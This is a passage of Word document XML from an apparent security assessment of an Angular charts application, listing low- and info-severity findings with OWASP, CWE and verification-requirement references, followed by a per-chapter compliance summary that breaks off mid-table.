              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1188</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V1.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Backlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chartjs (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/chartjs</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chart.js Canvas Accessibility Gap — Indirect Security Implication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V5.3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Backlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D3 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/d3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unconfirmed D3.js Version — Known CVE Exposure Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1104</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V14.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Backlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Charts (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No Security Logging or Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-778</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V7.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Backlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Charts (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Standalone Component Migration Gap — NgModule Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V1.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Backlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chartjs (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/chartjs</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No Security Logging or Monitoring — Chartjs Screen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-778</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V7.1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Backlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chartjs (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/chartjs</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unconfirmed Third-Party Dependency Versions — Chart.js and ng2-charts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1104</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V14.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Backlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="X8dda7554496c479221334964960b7f57a1c7436"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. AVSV Compliance Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Assessment is based exclusively on documentation review. Chapters with insufficient documentation coverage are marked "Limited Assessment." Compliance percentages reflect only the requirements that could be assessed from the provided documentation.</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Chapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Topic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Requirements Assessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Architecture, Design &amp; Threat Modeling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">25%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/A — Limited Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Session Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/A — Limited Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Validation, Sanitization &amp; Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">33%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Error Handling &amp; Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100% — Limited Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Communication Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/A — Limited Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Malicious Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
